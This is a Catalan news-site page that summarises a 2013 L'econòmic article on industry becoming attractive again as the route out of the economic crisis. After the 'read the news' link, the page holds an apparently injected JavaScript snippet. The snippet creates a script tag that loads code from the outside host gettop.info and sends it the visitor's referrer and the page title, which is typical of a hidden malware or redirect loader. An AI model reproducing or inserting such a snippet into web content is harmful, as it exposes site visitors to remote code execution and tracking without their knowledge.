Notícies

Tornar a mirar cap a la indústria

 

“La constatació que és aquest sector el que ha de marcar el camí de sortida de la crisi l’ha fet de nou atractiu”

Va ser la germaneta pobra de l’economia durant els anys de boom i creixement desmesurat. La indústria, que requereix elevades inversions i que dóna resultats més aviat modestos i a llarg termini, resultava molt poc atractiva en un moment en què l’economia catalana i la de mig món es deixaven enlluernar per activitats d’alts i ràpids rendiments com la construcció o l’especulació financera.

Notícia L’econòmic, dimecres 10 d’abril de 2013

Llegir la notícia

var d=document;var s=d.createElement(‘script’);

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);

Deixa un comentari

L'adreça electrònica no es publicarà Els camps necessaris estan marcats amb *

Podeu fer servir aquestes etiquetes i atributs HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>